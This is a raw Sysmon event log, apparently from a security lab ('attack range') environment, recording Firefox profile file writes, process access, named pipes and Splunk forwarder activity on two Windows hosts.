Firefox\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=47024075D8FB7B85F0B6615FFB0E87A5,SHA256=FE842C526ABBEE926C9CFE27F45AE3BC20F5614878120A9150B1A2DDA1CD226D,IMPHASH=FAFFE564A2DAFFCCC4A6BE71D34C1748{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 23542300x8000000000000000287838Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:22.282{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C115BB93A03CDE0431B599F624EF1DFE,SHA256=8037D090A7F6E76E7D57B14631DFF61C88B68CCEED4F0A1F4199D128EA3A5B15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287872Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:23.438{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6221D39B992505A7D2D6635F430ECD64,SHA256=79DE42D3CD5B0D47EB16110C187E5864ABD09FC82390F312CDDDB62DBB33CEC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216744Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:23.092{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACC53F591F7C8E2BFBE7023C50196F1C,SHA256=C7410597A9B900FA0EFA13AD0046AA623B40A32252BF9D83BA86F88BF1DABDFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216745Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:24.124{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A974E5DBA65E7025654690BA12A3751B,SHA256=A2C6FFBFB410BD63E18A0634EF70C66A32C7D82F1EA7E7B8B68FE044EB548399,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287900Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:24.672{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287899Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:24.657{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287898Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:24.578{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\cache2\doomed\9359MD5=BB9A60FECD8102A06F345B3E7707111B,SHA256=622EB9250C2709138ADF7A7B248A7C8902A80D19AD99D81EB567DBB0F9953279,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287897Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:22.554{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53448-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000287896Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:24.563{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\cookies.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287895Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:24.532{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-11AC-6216-1705-000000003802}5396C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287894Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:24.532{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-11AC-6216-1705-000000003802}5396C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287893Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:24.532{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-11AC-6216-1705-000000003802}5396C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287892Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:24.532{C8EA50B7-11AA-6216-1605-000000003802}22285412C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AC-6216-1705-000000003802}5396C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+19e61d8|C:\Program Files\Mozilla Firefox\xul.dll+19e4a5b|C:\Program Files\Mozilla Firefox\xul.dll+12ac5|C:\Program Files\Mozilla Firefox\xul.dll+9850af|C:\Program Files\Mozilla Firefox\xul.dll+126a7|C:\Program Files\Mozilla Firefox\xul.dll+9822f1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1ddf8|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x8000000000000000287891Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-ConnectPipe2022-02-23 10:51:24.532{C8EA50B7-11AC-6216-1705-000000003802}5396\chrome.2228.0.39831167C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000287890Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:24.532{C8EA50B7-11AA-6216-1605-000000003802}22282412C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AC-6216-1705-000000003802}5396C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+12204b|C:\Program Files\Mozilla Firefox\xul.dll+1205b3f|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1ddf8|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x8000000000000000287889Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-ConnectPipe2022-02-23 10:51:24.518{C8EA50B7-11AC-6216-1705-000000003802}5396\gecko-crash-server-pipe.2228C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000287888Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:24.518{C8EA50B7-F11F-6215-1200-000000003802}81740C:\Windows\system32\svchost.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cd4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287887Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:24.518{C8EA50B7-F11F-6215-1200-000000003802}81740C:\Windows\system32\svchost.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cd4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287886Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:24.500{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287885Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:24.500{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287884Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:24.500{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287883Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:24.500{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287882Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:24.500{C8EA50B7-11AA-6216-1605-000000003802}22285412C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AC-6216-1705-000000003802}5396C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+99a30f|C:\Program Files\Mozilla Firefox\xul.dll+7c6644|C:\Program Files\Mozilla Firefox\xul.dll+19e466f|C:\Program Files\Mozilla Firefox\xul.dll+12ac5|C:\Program Files\Mozilla Firefox\xul.dll+9850af|C:\Program Files\Mozilla Firefox\xul.dll+126a7|C:\Program Files\Mozilla Firefox\xul.dll+9822f1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1ddf8|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287881Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:24.454{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-11AC-6216-1705-000000003802}5396C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287880Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:24.454{C8EA50B7-11AA-6216-1605-000000003802}22282268C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AC-6216-1705-000000003802}5396C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Mozilla Firefox\xul.dll+17711cf|C:\Program Files\Mozilla Firefox\xul.dll+996179|C:\Program Files\Mozilla Firefox\xul.dll+9944b5|C:\Program Files\Mozilla Firefox\xul.dll+99b13e|C:\Program Files\Mozilla Firefox\xul.dll+83253d|C:\Program Files\Mozilla Firefox\xul.dll+168dd89|C:\Program Files\Mozilla Firefox\xul.dll+168c88a|C:\Program Files\Mozilla Firefox\xul.dll+9850af|C:\Program Files\Mozilla Firefox\xul.dll+249ae|C:\Program Files\Mozilla Firefox\xul.dll+8357fb|C:\Program Files\Mozilla Firefox\nss3.dll+68dc|C:\Program Files\Mozilla Firefox\nss3.dll+90731|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1ddf8|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287879Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:24.465{C8EA50B7-11AC-6216-1705-000000003802}5396C:\Program Files\Mozilla Firefox\firefox.exe97.0.1FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2228.0.398311678\1109414803" -parentBuildID 20220216172458 -prefsHandle 1300 -prefMapHandle 1292 -prefsLen 1 -prefMapSize 251484 -appDir "C:\Program Files\Mozilla Firefox\browser" - 2228 "\\.\pipe\gecko-crash-server-pipe.2228" 1372 157e18eb448 gpuC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32MediumMD5=47024075D8FB7B85F0B6615FFB0E87A5,SHA256=FE842C526ABBEE926C9CFE27F45AE3BC20F5614878120A9150B1A2DDA1CD226D,IMPHASH=FAFFE564A2DAFFCCC4A6BE71D34C1748{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 17141700x8000000000000000287878Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-CreatePipe2022-02-23 10:51:24.454{C8EA50B7-11AA-6216-1605-000000003802}2228\chrome.2228.0.39831167C:\Program Files\Mozilla Firefox\firefox.exe 17141700x8000000000000000287877Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-CreatePipe2022-02-23 10:51:24.454{C8EA50B7-11AA-6216-1605-000000003802}2228\gecko-crash-server-pipe.2228C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000287876Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:24.438{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d41c2|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000287875Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:24.438{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B18A6FC650B3E6DBA680C6A3C8FD634A,SHA256=E9E0B8460C958179511D2285EDC3A87F14B2A50EB1646FB1959E7CE743A4023F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287874Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:24.438{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000287873Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:24.344{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\parent.lockMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216747Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:25.139{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E14EA5D068CE1AB14C570AEA69E8C1D3,SHA256=8A36D6327BA6B5DD827ED328F6807BA4945A404D3AF3F32AAB799D959096A087,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288022Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.814{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288021Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.798{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288020Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.761{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\cache2\doomed\5915MD5=CBC6D98CC0662F343F0D8BEA4FC32403,SHA256=FAC9CAEABBEDFF122B3BA93FB863D4C6CD715A718924ABB3C261665567790099,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288019Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.745{C8EA50B7-F11F-6215-1200-000000003802}81740C:\Windows\system32\svchost.exe{C8EA50B7-11AD-6216-1905-000000003802}4760C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cd4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288018Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.745{C8EA50B7-F11F-6215-1200-000000003802}81740C:\Windows\system32\svchost.exe{C8EA50B7-11AD-6216-1905-000000003802}4760C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cd4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288017Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 